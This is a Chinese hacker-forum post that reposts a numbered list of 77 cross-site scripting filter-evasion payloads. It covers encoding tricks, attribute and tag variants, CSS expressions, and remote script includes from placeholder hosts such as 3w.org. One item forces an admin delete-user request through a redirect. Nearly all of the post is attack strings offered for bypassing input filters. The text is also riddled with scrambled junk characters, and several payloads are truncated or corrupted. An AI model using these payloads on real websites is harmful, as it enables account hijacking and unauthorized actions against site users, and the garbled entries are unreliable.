貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
& n8 N# o3 @& n3 ?$ P2 O+ e
7 w n$ n& m9 l( e (1)普通的XSS JavaScript注入, G3 M h% O. Q' S
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& v C) ]8 \* E7 ^4 f$ X# Q
9 J8 b1 L$ D; B; B (2)IMG标签XSS使用JavaScript命令
( U# j7 g! @ Y6 f; k4 t+ ?. | <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& Q) h: N' A" B' _" D# d* V0 Z4 {2 A5 J! E4 m; N
(3)IMG标签无分号无引号( d8 k4 ]% X% H% R
<IMG SRC=javascript:alert(‘XSS’)>5 q- W3 T. S# x% }
_' } l; C. ~( c" y) Y (4)IMG标签大小写不敏感
4 W6 k( G- L" T1 Y d <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
3 r i0 X, C3 E' C
) O6 _* b# i: C% A8 P (5)HTML编码(必须有分号)
) z9 {- y, o+ }) p8 \ <IMG SRC=javascript:alert(“XSS”)>
$ l7 W$ p- c U$ @4 g2 p" r+ g
: ^7 W6 k/ E/ }% }$ m2 n( D. V9 Z (6)修正缺陷IMG标签
, o2 z6 Y$ H, b. k! W. ` <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: A. I4 g: a6 U" ]8 c% G5 m8 t
& p0 T4 K, R4 x: X: k5 `
(7)formCharCode标签(计算器)
' `' ]2 l$ S/ y, y9 P( K <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
1 _: h- p" e' c) j+ O% e& b% L9 a& B
(8)UTF-8的Unicode编码(计算器)
( B8 l) W! s/ W0 T <IMG SRC=jav..省略..S')>
1 i' k" G4 q$ ]
7 T; p t" R# \4 \% I |. J$ C3 x) ] (9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 ?* ] Y: u$ Z" p3 c, \# ]) |
<IMG SRC=jav..省略..S')>
, K8 p; n2 R3 N, {
' S) p* I, k6 n! a (10)十六进制编码也是没有分号(计算器)
0 ~3 y; W2 k* r <IMG SRC=java..省略..XSS')>
! _- p4 e: a6 ?7 m2 S) U
: o& v2 H) j# u" I (11)嵌入式标签,将Javascript分开+ d4 b4 @+ p4 N( Z1 y5 ~+ C& i- m
<IMG SRC=”jav ascript:alert(‘XSS’);”>* e( X: M7 v/ ]/ N }
0 `. @$ z) F! i0 v (12)嵌入式编码标签,将Javascript分开- d* [2 ?1 U1 V7 u3 k
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 v; w1 L0 `/ F# J! A1 f7 o/ K2 ]* L! L
(13)嵌入式换行符
( }' T1 I9 C4 q0 u! @ <IMG SRC=”jav ascript:alert(‘XSS’);”>+ B, g' H c9 s
- ?. {. `/ w) g7 l2 N- [
(14)嵌入式回车
0 d) F3 @$ X" n- v+ |9 A1 ] <IMG SRC=”jav ascript:alert(‘XSS’);”>$ W I% A5 o$ H
0 h6 S/ l9 k) H1 E. }" t$ | (15)嵌入式多行注入JavaScript,这是XSS极端的例子
9 a- Z7 \6 g* W9 M$ G# @6 N/ H <IMG SRC=”javascript:alert(‘XSS‘)”>3 g/ b( L) p/ @2 B9 i6 B* n
L. Z# I. v2 c* S
(16)解决限制字符(要求同页面)
/ U5 i [* S9 w( D, Y% `3 ~ <script>z=’document.’</script>
: y- n1 r* p( h4 e$ |3 k" ? <script>z=z+’write(“‘</script>4 o) U! M2 {; Y: d1 c1 i
<script>z=z+’<script’</script>$ H$ v3 Q7 u! w
<script>z=z+’ src=ht’</script>
7 u% v0 y5 U3 H. F' b# Y* }# Y <script>z=z+’tp://ww’</script>" _4 g3 a* f! W! j
<script>z=z+’w.shell’</script>
, `4 k5 w; T3 s4 u3 D: K <script>z=z+’.net/1.’</script>7 W9 n$ G* R b& Y$ d4 o" ?; G
<script>z=z+’js></sc’</script>
" G% v/ _ d$ V <script>z=z+’ript>”)’</script>2 ^& Z: m' a# x% m" a8 b3 H, v
<script>eval_r(z)</script>
3 t8 P/ d" J3 b8 M# p" m$ G' h6 C7 H/ e1 I0 q2 R) d6 Z9 M; \" u: R
(17)空字符1 a' \" \& b( G* V
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out5 X1 [4 t$ ^6 k+ Y$ f
: W( T/ ~/ D2 \7 s
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
: u7 u9 M1 l [ perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ K2 g# n( P$ W4 M7 `
r: a3 }5 j+ }+ L
(19)Spaces和meta前的IMG标签; l% k# Q- m# T
<IMG SRC=” � javascript:alert(‘XSS’);”> N5 O- f8 N9 v
9 T t5 A3 H6 \+ f* i
(20)Non-alpha-non-digit XSS
7 Z3 l4 G9 n# {5 ]" Q <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" u5 @- E* X) ~/ }' y# k0 R! s. ]1 Q! U( |
(21)Non-alpha-non-digit XSS to 26 t! ~' Y' t& \+ `, t( C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
# b0 B: g- h3 k0 o9 W
9 Q; F! e- C3 k/ f9 J8 E; N5 v (22)Non-alpha-non-digit XSS to 39 T( m2 v. [) c T9 _" R# J
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
7 c+ w! E: c1 |
( G2 Q4 u4 N. f! I5 p* @# p! g (23)双开括号
?6 U; ^. I" r( a) h; K% r <<SCRIPT>alert(“XSS”);//<</SCRIPT>
- [* q6 M1 m' o$ @+ |6 S
" Z! o- k/ _* I5 \ (24)无结束脚本标记(仅火狐等浏览器)& T. q3 E/ ?1 J E
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>5 d, c* T7 G- h' W$ i- e
( }* |3 R% Z7 _: _' v9 { (25)无结束脚本标记2
% W- ?- ]! @8 P) R) y <SCRIPT SRC=//3w.org/XSS/xss.js>6 [* b7 K: ?' R
( c9 v* V8 B6 c* ]2 b
(26)半开的HTML/JavaScript XSS* {+ K* j6 X% b% W' O( P
<IMG SRC=”javascript:alert(‘XSS’)”
& k4 a4 A0 d' q7 [2 L$ O. `: ~. X' D5 P2 g4 A
(27)双开角括号
8 i! n5 g( Q/ c/ ?. c7 s( H <iframe src=http://3w.org/XSS.html <
3 x' n+ ~! G" [; ~" b( N1 |0 r6 {+ r
(28)无单引号 双引号 分号
0 H( }: J0 z, d; D <SCRIPT>a=/XSS/0 X3 N( T4 d5 t: _( E C" q6 Q
alert(a.source)</SCRIPT>! Z* h& X( f! d8 x. e7 S- X8 W+ R
, Z1 N' J2 s; h* [! S, G; | (29)换码过滤的JavaScript: i1 }. V% w/ O% `5 k& B5 `* n
\”;alert(‘XSS’);//
4 J# i0 y) ~* H5 }0 _4 V6 s4 ~" ~4 ^7 J7 ^
(30)结束Title标签" V% h. h: G. [ g" m$ c
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
8 e2 F2 Q8 I$ u
3 i+ v: ?7 J1 n: ~' W, ~2 P (31)Input Image8 h$ C" B' x! T6 V, a
<INPUT SRC=”javascript:alert(‘XSS’);”>
$ p! C0 x5 j. p2 g' U
3 a) b- C% d9 M# `" s- d. u6 Q (32)BODY Image
; U) Q' Y: i2 ]+ L# O* q: m <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
" q; B" `( P$ O# b2 ^+ u1 F# [2 I5 r2 U3 N
(33)BODY标签
6 m- e- R0 S' B( m! K, H <BODY(‘XSS’)>
) g9 l0 X9 `# Z. B
) A( [% f6 w3 m9 a! [# i% ]0 F (34)IMG Dynsrc
m& Y# u/ o% k7 t) ^ <IMG DYNSRC=”javascript:alert(‘XSS’)”>. S0 R1 V& W- ~+ y
6 E! s6 ?& Y9 b; T (35)IMG Lowsrc2 e0 E2 p% l- M9 l% f9 c
<IMG LOWSRC=”javascript:alert(‘XSS’)”>% U7 O7 K$ \7 |
2 H& a' A4 w# h' D9 w7 M* _) P (36)BGSOUND
# d8 ?1 _! R r T! B- j <BGSOUND SRC=”javascript:alert(‘XSS’);”>' T% p2 @( a% r
+ E( m, K3 t6 p8 F4 A- g: ] (37)STYLE sheet
) o* `- Y, j$ P! V; ` <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
/ n y6 p7 A# e: z
6 n9 k0 v2 K4 X, g (38)远程样式表
* Z/ z- @% s" ~+ H <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: O- B `* ?5 O# \, ~* Z
$ j6 R3 b' u# m (39)List-style-image(列表式)
6 b" S9 @+ S% r8 p <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 Q& v+ L) H" W! `1 t1 J
3 D+ {, e/ g4 ^$ c
(40)IMG VBscript& M7 [5 z# x, C* K: s- _
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
4 k3 B4 f# u' D- U8 y7 U) _ V7 i* ]
2 @. w+ D) B# e (41)META链接url
^2 T- ^" l- ? <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>$ a6 H6 Q4 ]/ B& i/ X
3 G# v3 w5 {$ J (42)Iframe
9 Z; K& s$ f9 S1 f" A <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>2 G) r$ V0 ~# v; t' p
9 f' `: C8 d8 l* t- u u) s- c (43)Frame
% `+ A" D; }+ p0 }3 A5 ?' L, \$ U <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
; ?/ B% g+ m7 o6 h' I
1 H2 [* Z, m- p) t8 q (44)Table
# C0 c7 s4 ?/ @) a) V& e2 V. U <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
1 S$ O' I/ c; ~6 @3 U5 R) N& S. |% `& [9 a5 D) q1 R
(45)TD
- ]+ U% o; d5 b- A. q W8 O <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>( p& d O9 ~2 w+ r* k1 b" F! h
$ H5 X" P3 | i
(46)DIV background-image
: L* c$ `( q8 L, J. ?& r0 h <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ N, D. V, v" `+ [" V; n- L. S
0 c5 L! \" K9 v# r0 ^$ M6 T (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
# R$ u) J* X, i! N) ~+ n' k6 W <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
- @: J( z! i, L6 t" {1 e5 k; d6 d0 |( s8 D6 F
(48)DIV expression9 k) R g( S1 A2 Q4 z$ }
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>( M3 o9 N* }8 r
5 X& @4 f+ G7 K% `
(49)STYLE属性分拆表达) v; L( V9 z) M( r6 t
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ a! c# K1 ^' Y
) I! A6 n* g/ j! I* j (50)匿名STYLE(组成:开角号和一个字母开头)( E- { x4 w2 v' y/ |! c
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
( j! F- v! M4 y/ Q5 g
: M8 V' k& a' d0 B' i (51)STYLE background-image
, b5 U+ D5 j+ d! i1 l: W @ <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>8 `- g! @6 Z$ G9 f+ N
; i+ u( P k; {1 m" K9 p) c (52)IMG STYLE方式- K/ y" u7 W. p: g0 _1 w3 L6 N
exppression(alert(“XSS”))’>$ ^6 L9 M6 z$ N( {/ h
& W' x5 |+ J: B* G' X+ e (53)STYLE background
& k0 n, Q& a/ b/ ^! Y <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! d) x9 S6 L, r2 P7 k$ B l9 v9 ?6 v$ K; j
(54)BASE
: b2 N. B# A3 U. b. U. }4 k% K <BASE HREF=”javascript:alert(‘XSS’);//”>
8 W/ C h7 a( H: V. _! a0 @6 X( r
6 V3 Y0 I8 B! F! T (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
[1 K$ ^2 q6 u4 Y! C u, n <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>( _- Z F+ L; u% \; S5 [
. t4 } T' c0 M. L9 @5 q
(56)在flash中使用ActionScrpt可以混进你XSS的代码
. B$ e0 k/ U7 k a=”get”;
3 P% d- y# v4 k$ y% S( k b=”URL(\”";7 w; s& y5 f* R" J$ l
c=”javascript:”;" e( e% w) a2 t$ ^
d=”alert(‘XSS’);\”)”;
" u9 z5 X6 M6 E, R eval_r(a+b+c+d);
' e5 q/ G" v$ f; v! l2 L( h: E& X, q# r6 h
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上. u! J% y1 Z( h
<HTML xmlns:xss>& p5 A, i- s3 |+ g1 R8 l1 c* ?# \
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
& O- F" }, R3 P- S" \* l <xss:xss>XSS</xss:xss>
4 L* m3 Y) U6 y% q. m. F </HTML>5 n8 r, W% K9 ]( c0 D& D- Y, _, B
+ S4 T% K. @, L. s5 H M
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用0 x3 S* @( |5 l* ^3 X% A9 _. R3 j
<SCRIPT SRC=””></SCRIPT>7 p. t" v9 ]* i* W: p" i: \6 r
" |" Q6 |7 O* {) u3 _. W: ~ (59)IMG嵌入式命令,可执行任意命令
; \) O" }- V2 \! c3 a; B( \ <IMG SRC=”http://www.XXX.com/a.php?a=b”>: D g, p* M: a: d# G) ~
7 s. E' N' l! `
(60)IMG嵌入式命令(a.jpg在同服务器). F2 M5 H) h9 K9 M( b" v0 ~# |" b
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
) l; y, A; J4 [& S% M' J
% \0 O! p7 b, X" m P6 G( O, {2 p4 h( X (61)绕符号过滤
6 D4 I2 r5 X$ V4 p8 N" Z2 S8 i <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 n* v: Q& r7 f+ h0 l
2 e, t( P$ N3 x (62)
4 s7 W- J$ Y, ?* w: v <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ f( W8 s3 Z6 y: X0 w% J! p
4 y: p2 J/ V% X1 u, L( _; F5 f, C (63)# j5 C: E3 v5 k% Y' R, b
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>3 B7 k- G- h3 }( p# k2 A% x' \
! k' N, L4 Z7 o0 K, e (64). y% c+ ], n- U- L' q' D( Z5 i( S
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>! Q/ R D G7 @
% U/ X1 A; A2 p q' t9 U0 M' O (65)0 s4 l' E2 f5 m. L. Q& ]
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>8 }: `! \# S3 m- A
1 V, l/ K7 M! w/ U
(66)# X& Z/ R6 I$ l. q4 F
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>3 x1 A: ]+ s+ d7 F: r
; u" A- r1 a1 T' a (67)
% d7 Y0 \( Z! N% j! L9 p* ] <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
) m& u7 d9 X! @9 V6 T6 J
/ Y8 h4 ]& C3 d+ q$ ?* x# u (68)URL绕行
y/ c) b; I! b" A <A HREF=”http://127.0.0.1/”>XSS</A>
0 x; U2 I- d; Q2 C: k' K, O5 X/ F. D( f# W
$ S7 i; v; ~5 g# @* z (69)URL编码: K/ i5 @, T! n/ x) d
<A HREF=”http://3w.org”>XSS</A>8 ?) g0 ?, K9 [4 D3 J9 Q
! o5 U% A/ @0 r, s: Y7 }6 c% T (70)IP十进制
6 p. H# V% T6 g6 B2 h) N <A HREF=”http://3232235521″>XSS</A>! \0 S, t- l# t) [% W0 G/ p
+ T+ }$ @2 {+ H6 q! v! v X
(71)IP十六进制0 w8 n% ]$ \- c" e
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
" ^* G- T5 _6 x6 I: j
$ o: w/ c2 l& ^' Y3 ^ (72)IP八进制, b6 h* F# d& C5 o+ J. Z- K, r
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
# P( ~2 I/ j! }. j) l% T) D
, i0 O( t" C4 K8 a (73)混合编码& b, H6 e" y# c, d1 y# e
<A HREF=”h
' k3 s" z$ I) O% z* F tt p://6 6.000146.0×7.147/”">XSS</A>
. y; C; B" J3 Z* O' G* g& ?3 L @% p R
(74)节省[http:]
% X" k e( c/ v5 J <A HREF=”//www.google.com/”>XSS</A>/ r1 \# l/ B$ ]/ v
& E/ ]; U# ?& k [
(75)节省[www]) \) C7 X; Z, Q2 E
<A HREF=”http://google.com/”>XSS</A>5 ]: E0 a( }: d" ?* c( w( e) y
: o8 s# R& m- @4 q t
(76)绝对点绝对DNS/ w, x/ k( ]8 s% r( ^- E2 B
<A HREF=”http://www.google.com./”>XSS</A>
! y ^5 p# [: m* t6 D
: V, l! o o/ C" `' d @ (77)javascript链接) b* ~! Y0 K8 }' a' \/ V& K5 {
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对